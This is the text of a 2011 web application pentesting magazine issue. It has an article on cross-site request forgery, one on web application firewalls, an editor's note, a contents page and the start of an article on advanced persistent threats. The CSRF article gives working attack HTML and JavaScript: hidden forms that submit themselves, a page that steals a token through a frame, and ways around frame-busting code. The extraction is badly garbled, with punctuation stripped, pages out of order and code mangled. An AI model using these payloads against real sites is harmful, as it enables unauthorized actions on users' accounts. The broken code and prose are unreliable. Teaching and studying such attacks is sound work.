ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
Page 4 httppentestmagcom012011 (1) November Page 5 httppentestmagcom012011 (1) November
ADVANCED PERSISTENT THREATSThe significance of HTTP and the Web for Advanced Persistent Threatsby Matthieu Estrade
The means used to achieve an APT are often substantial and proportional to the criticality of targeted data ndash note Matthieu Esterade Author claims that APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations Real-life experience of application management highlights difficulties in implementing all the good practices How important APT is you can find out reading the article
WEB APP SECURITYWeb Application Security and Penetration Testingby Bryan Soliman
Author shows the importance of Penetration Testing in Web Application Security Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase Automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications
Developers are form Wenus Application Security guys from Mars
by Paolo PeregoWe know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code Paolo Perego shows in his article how difficult the communication between this two groups is
WEB APP VULNERABILITIESPulling legs of Arachniby Herman Stevens
Herman Stevens shows us in-depth analysis of Arachni Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed
06
12
EDITORrsquoS NOTE
20
22
Web Application Security and VulnerabilitiesHave you ever wondered how important for IT security is the security of web applications
The brand new November issue of Web App Pentesting magazine will attempt to provide you some answers This new Web App Pentesting features information about Web Application Security and Vulnerabilities For the first time we would like to present the penetration testing topic from web applicationrsquos point of view We publish the articles about how important is Pentesting in WAS We gathered a very good articles from different sources to give you a deep insight into this matter
In November issue you will find a very good article on the Significance of HTTP Protocol and Web for Advanced Persitetnt Threats written by Matthieu Estrade He shows us the importance of APT attacks The article is exhaustive mini-guide to APT and how particular threats can be defined as APTrsquos On page 6 to find out more about the APT
Go to pages 12-21 to read the articles about WAS The first article is written by Bryan Soliman on Web Application Security and Penetration Testing He introduces you to nature of Pen testing for web applications I think that most of you will find this article very useful and informative overview of WAS Just read page 12
Web Application Vulnerabilities Two great articles covers important aspects of this metter I would like to introduce you Herman Stevens article Pulling legs of Arachni that specifies analysis of Arachni ndash web application vulnerability scanner More on page 22 Second worth of read article is XSS Beef Metaspoilt Exploitation written by Arvind Doraiswamy Author describers Cross Site Scripting with all practical aspects ndash page 30
All articles are very interesting and they need to be marked as Need to be Read As always
Thank the Beta Testers and Proofreaders for their excellent work and dedication to help make this magazine even better Special thanks to all authors that help me create this issue
I would like to mention some supporters this time and thank Jeff Weaver Daniel Wood Edward Wierzyn for their help and gorgeous ideas They work really hard to get magazine out for you to read I also would like to thank all of other helpers for their contribution to the magazine
The last but not least I would like to welcome Ryk Edelstain on our Advisory Board Ryk has over 30 years of experience in IT Security As he describes himself ldquoI have a profound understanding of technology and the practices behind penetration testing Although I work with others technical resources to handle the technical aspect of IT threat assessment my training is in TSCM (Technical Surveillance CounterMeasures) for the detection and neutralization of both analogue and digital surveillance technologies In fact the practice and processes I have learned in the TSCM practice parallels those of PT where the environment is assessed a strategy and process is defined and a documented and methodical process is executed Results are continually evaluated at each step and as the environment is learned the process is refined and executed until the assessment is completerdquo Ryk will help us to make PenTest more worth of reading
Enjoy reading new Web App PentestingKatarzyna Zwierowicz
amp Pentest team
Page 4 httppentestmagcom012011 (1) November Page 5 httppentestmagcom012011 (1) November
TEAMEditor Katarzyna Zwierowicz katarzynazwierowiczsoftwarecompl
Betatesters Jeff Weaver Daniel Wood Edward Wierzyn Davide Quarta
Senior ConsultantPublisher Paweł Marciniak
CEO Ewa Dudzicewadudzicsoftwarecompl
Art Director Ireneusz Pogroszewski ireneuszpogroszewskisoftwarecomplDTP Ireneusz Pogroszewski
Production Director Andrzej Kuca andrzejkucasoftwarecompl
Marketing Director Ewa Dudzicewadudzicsoftwarecompl
Publisher Software Press Sp z oo SK02-682 Warszawa ul Bokserska 1Phone 1 917 338 3631wwwpentestmagcom
Whilst every effort has been made to ensure the high quality of the magazine the editors make no warranty express or implied concerning the results of content usageAll trade marks presented in the magazine were used only for informative purposes
All rights to trade marks presented in the magazine are reserved by the companies which own themTo create graphs and diagrams we used program by
Mathematical formulas created by Design Science MathTypetrade
DISCLAIMERThe techniques described in our articles may only be used in private local networks The editors hold no responsibility for misuse of the presented techniques or consequent data loss
in Ruby by Tasos ldquoZapotekrdquo Laskos Step by step author acquaints us with process of instalation and using the programm Also shows us clearly the advantages and disadvantages of Arachni
XSS BeeF Metaspolit ExploitationBy Arvind Doraiswamy
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code In this article Arvind Doraiswamy shows us how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using BeeF
Cross-site request forgery In-depth analysis by Samvel Gevorgyan
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users Samvel Gevorgyan step by step describes how to proceed with CSRF vulnerability
WEB APPS CHECKINGFirst the Security Gate then the Airplaneby Olivier Wai
Olivier Wai is trying to give us the answer ldquoWhat needs to be heeded when checking web applicationsrdquo Any web application old or new needs to be secured by a Web Application Firewalls (WAFs) in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place Web Application Firewalls (WAFs) If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
CONTENTS
38
34
30
EDITORrsquoS NOTE
ADVANCED PERSISTENT THREATS
Page 6 httppentestmagcom012011 (1) November Page 7 httppentestmagcom012011 (1) November
The omnipresence of the Web is now a given and it serves a wide variety of situations as detailed n the non-exhaustive list below
bull Community applicationsbull Institutional Web sites bull Online transactionsbull Business applicationsbull IntranetExtranetbull Entertainmentbull Medical databull Etc
In response to user requirements and developing needs content driven by HTTP has become incre-asingly rich and dynamic It even goes as far as incorporating script languages that transform the Web browser into a universal enhanced client that espouses different platforms PC Mac and Mobile users all form part of the connected masses operating on their chosen platforms But have these new privileges arrived without any underlying constraints
The race towards sophistication has not been accompanied by similar developments in respect of the security and reliability of data circulated across the Web A concrete example is the fact that HTTP does not provide native support for sessions and it is therefore
difficult to be sure that requests received during browsing emanate from the same user Large scale use of the Web illustrates the
discrepancy that exists in terms of security versus volume and this inherent flaw has become a major IT system issue making HTTP a preferred vector of attacks and data compromise
Cybercriminals are aware of the exploitability of the Web and have made it their number one target Not a week goes by without a an organization being compromised via HTTP
bull Playstation Network (Sony) -gt Wordpress version problem
bull MySQL (Oracle) -gt SQL Injectionbull RSA (EMC) -gt SQL Injectionbull TJX -gt SQL Injection
The above attacks conceived and carried out with precise attention to logistics are by no means an innovation but we now refer to them differently using the term APT Advanced Persistent Threat
Bolstered cyber-activity the discovery of intrusion and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage which in turn amplifies the impact on the image of the unfortunate victims that are more often than not high-profile businesses or international organizations
The SignificanceOf HTTP And The Web For Advanced Persistent
Threats
Initially created in 1989 by Tim Berners-Lee of the CERN Hypertext Transfer Protocol (HTTP) was actually launched one year later and continues to use specifications that date to 1999 ndash a mere time lapse of twenty-two years in the transmission of Web-based content
ADVANCED PERSISTENT THREATS
Page 6 httppentestmagcom012011 (1) November Page 7 httppentestmagcom012011 (1) November
The use of HTTP may be required because different areas are often filtered out leaving only necessary protocols to emerge HTTP is often left open to allow administrators to navigate through these machines or to update them
To remain as stealthy as possible a strategic backdoor to the Web application or the application server will use HTTP as a direct connection and or as a tunnel to other applications During the movement it will not be filtered and no attention will be drawn to a process that opens a port unknown to the system
Bounce MechanismsWhenever changes occur witin an IT system the steps involving initial intrusion and continued presence are repeated as many times as necessary until it the goal is attained and sensitive data becomes accessibleHTTP once again comes into play during these stages of development because it is predominantly active and open between the different areas
bull Dialogue between server applicationsbull Web Servicesbull Web Administration Interfacebull Etc
It often happens that security policies contain the same weaknesses from one area to another
bull Exit ports openedbull Filtering omission on higher level portsbull Use of the same default passwords
Data ExtractionOnce crucial information is reached it is necessary to quit the system as discreetly as possible and over a certain length of time HTTP protocol is often enabled for exit without being monitored for several reasons
bull Machines are often updated using HTTP bull When an administrator logs on to a remote
